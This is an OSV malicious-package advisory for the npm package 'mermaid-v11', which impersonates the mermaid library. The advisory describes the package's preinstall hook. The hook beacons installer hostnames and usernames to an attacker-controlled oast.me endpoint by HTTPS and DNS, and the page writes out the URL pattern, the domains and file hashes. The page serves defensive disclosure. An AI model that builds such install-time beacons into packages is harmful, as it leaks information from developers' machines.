MAL-2026-5539
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/mermaid-v11/MAL-2026-5539.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-5539
- Published
- 2026-06-11T00:41:50Z
- Modified
- 2026-06-11T02:31:31.358920593Z
- Summary
- Malicious code in mermaid-v11 (npm)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (416d5c5ab1bc70076021520f20e67c3c52a81b74832379e19012fa2f6526c469)
The package impersonates the legitimate
mermaiddiagramming library (namemermaid-v11, bogus version9999.0.2, description 'Mermaid v11 diagramming library') and ships no library code — only a maliciouspreinstalllifecycle hook. Onnpm install, package.json line 6 runsnode -ethat readsrequire('os').hostname()and the OS username and beacons them out-of-band to an attacker-controlled Interactsh endpoint via two channels: an HTTPS GET tohttps://d8l0dj5t5p5il86s3d3gepriqucsnn1nd.oast.me/?h=<hostname>&u=<username>&pkg=mermaid-v11, and a DNS lookup ofmermaid-v11.<hostname>.d8l0dj5t5p5il86s3d3gepriqucsnn1nd.oast.meto leak the hostname through the resolver chain. The behavior fires automatically on default install with no user interaction, harvesting installer host identifiers for an attacker-controlled OAST listener.Source: ossf-package-analysis (003edde2881c4b52d0a0ae821b81083c569fc8bf9ef236a216c82054e2cb3b4f)
The OpenSSF Package Analysis project identified 'mermaid-v11' @ 9999.0.2 (npm) as malicious.
It is considered malicious because:
- The package communicates with a domain associated with malicious activity.
- Database specific
{ "malicious-packages-origins": [ { "versions": [ "9999.0.2" ], "sha256": "003edde2881c4b52d0a0ae821b81083c569fc8bf9ef236a216c82054e2cb3b4f", "source": "ossf-package-analysis", "modified_time": "2026-06-11T00:56:11Z", "import_time": "2026-06-11T01:21:48.587989408Z" }, { "import_time": "2026-06-11T01:21:48.528302812Z", "sha256": "e09f1e6e06b756c14d4bf0c26e54a82093ee00a8b8190974088973cb664aada7", "source": "ossf-package-analysis", "modified_time": "2026-06-11T00:41:50Z", "versions": [ "9999.0.0" ] }, { "id": "IN-MAL-2026-005359", "import_time": "2026-06-11T02:24:27.684217154Z", "sha256": "334e4086eca8d2c76ec7ba03c6e47af121ed5ef043b0e4bf30db86248d064467", "source": "amazon-inspector", "modified_time": "2026-06-11T01:46:53Z", "versions": [ "9999.0.2" ] }, { "id": "IN-MAL-2026-005358", "import_time": "2026-06-11T02:24:27.62799726Z", "sha256": "416d5c5ab1bc70076021520f20e67c3c52a81b74832379e19012fa2f6526c469", "source": "amazon-inspector", "modified_time": "2026-06-11T01:46:52Z", "versions": [ "9999.0.2" ] }, { "id": "IN-MAL-2026-005360", "import_time": "2026-06-11T02:24:27.762128916Z", "sha256": "5ef3e485f7b13c78c745d0e7165199eacb142cb62da22b44eaa51460474f10b9", "source": "amazon-inspector", "modified_time": "2026-06-11T01:46:58Z", "versions": [ "9999.0.1" ] }, { "id": "IN-MAL-2026-005364", "import_time": "2026-06-11T02:24:27.969639096Z", "sha256": "c3188d09fdd69443609241a8e3baac0c120837170b801b7eaa7ad2c0f5b5808a", "source": "amazon-inspector", "modified_time": "2026-06-11T01:48:16Z", "versions": [ "9999.0.0" ] }, { "id": "IN-MAL-2026-005361", "versions": [ "9999.0.1" ], "sha256": "e00db32b40228301a09dc2a6245bca93536d909e4e8e5b8c1d207586337947df", "source": "amazon-inspector", "modified_time": "2026-06-11T01:46:58Z", "import_time": "2026-06-11T02:24:27.80392393Z" }, { "id": "IN-MAL-2026-005365", "versions": [ "9999.0.0" ], "sha256": "ed2c7d1b0095d1d538c4302304b30a940efd8cb6c0de4ae28e09f76ef7de6a25", "source": "amazon-inspector", "modified_time": "2026-06-11T01:48:16Z", "import_time": "2026-06-11T02:24:28.026904512Z" } ] }- References
- Credits
-
-
- Amazon Inspector - FINDER
-
- OpenSSF: Package Analysis - FINDER
-
Affected packages
npm / mermaid-v11
Package
- Name
- mermaid-v11
- View open source insights on deps.dev
- Purl
- pkg:npm/mermaid-v11
Database specific
cwes
[
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
},
{
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code",
"cweId": "CWE-506"
}
]
indicators
{
"evidence_files": [
{
"path": "package.json",
"sha256": "e4d3d429ed4dda6b54024546edbbc51916777528ad52c4b8504b74884c5bc82f",
"tlsh": "b4f0d4fd0b10f6230ed90271429e720da5d2ea03754c9811c9e703ca47697f3bd75036"
}
],
"package_integrity": [
{
"filename": "mermaid-v11-9999.0.2.tgz",
"hashes": {
"sha512_sri": "sha512-hxuwqfGRTWtEAl0buMUz4BmUZaIisJTmMu/SAS2gzV+oALV5LGfWD2escRKjfWaGkPQA3tNePgUWMq4IUwFddg==",
"sha1": "48b784b0037181a17d7ed2fe08f214a2006220eb"
}
}
],
"domains": [
"d8l0dj5t5p5il86s3d3gepriqucsnn1nd.oast.me",
"mermaid-v11.scan-2579d3f17b08.d8l0dj5t5p5il86s3d3gepriqucsnn1nd.oast.me"
]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/mermaid-v11/MAL-2026-5539.json"